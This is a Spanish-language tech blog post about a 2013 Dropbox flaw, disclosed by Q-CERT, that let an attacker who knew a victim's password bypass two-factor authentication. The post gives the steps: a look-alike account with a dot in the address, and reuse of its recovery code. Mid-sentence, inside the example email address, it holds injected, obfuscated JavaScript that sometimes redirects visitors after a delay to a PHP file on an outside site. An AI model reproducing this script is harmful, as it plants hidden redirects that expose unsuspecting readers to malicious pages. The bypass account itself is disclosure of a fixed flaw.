Vulnerabilidad en Dropbox permitía saltar la autenticación en 2 pasos

Publicado el 10 julio 2013 ¬ 20:09 pmh.mscComentarios desactivados en Vulnerabilidad en Dropbox permitía saltar la autenticación en 2 pasos

El equipo de Q-CERT (CERT de Qatar) ha publicado una vulnerabilidad que permitía saltar la autenticación en 2 pasos de Dropbox, lo que posibilitaba a un atacante tener el control de los ficheros de la víctima.
Dropbox es un servicio en Internet que permite a los usuarios registrados el almacenamiento en la nube de archivos.
La autenticación en 2 pasos (Two-Factor Authentication, 2FA) es una capa de seguridad en la autenticación en la que se requiere algo más que un usuario y contraseña para acceder al servicio. Generalmente suele tratarse de un código adicional, generado en el momento de la autenticación, que es recibido por el usuario a través de SMS o una llamada en un terminal móvil.
El investigador Zoutheir Abdallah ha demostrado que si un atacante conoce el usuario y contraseña de la víctima, la autenticación en 2 pasos puede ser eludida. El error es debido a que Dropbox no verifica correctamente la dirección de correo electrónico del usuario que se está autenticando.
Para aprovechar el error se debe crear una cuenta similar a la de la víctima que contenga un punto (.) en cualquier sitio del nombre de la cuenta, por ejemplo, si se quiere atacar al usuario $NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to:victi.ma@servidor.com”>victi.ma@servidor.com.
A continuación se debe de activar la autenticación en 2 pasos en la cuenta fraudulenta y guardar el código de seguridad que genera el servicio. Dicho código nos permite acceder a la cuenta en el caso de haber perdido el teléfono.

Como último paso, el atacante, deberá autenticarse con la cuenta real de la víctima, y en el momento de recibir el código en el dispositivo móvil, se deberá indicar al servicio que hemos perdido el dispositivo y que queremos ingresar el código de seguridad, código que fue generado en el momento de la creación de la cuenta fraudulenta y que sería también válido para la cuenta de la víctima.

Q-CERT ha trabajado con Dropbox para resolver el incidente y actualmente se encuentra corregido.
 Fuente

__________

NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________

Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Noticias, Vulnerabilidades,

Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.

Los comentarios están cerrados.

 

Uso de cookies

Este sitio web utiliza cookies para que usted tenga la mejor experiencia de usuario. Si continúa navegando está dando su consentimiento para la aceptación de las mencionadas cookies y la aceptación de nuestra política de cookies, pinche el enlace para mayor información.

ACEPTAR
Aviso de cookies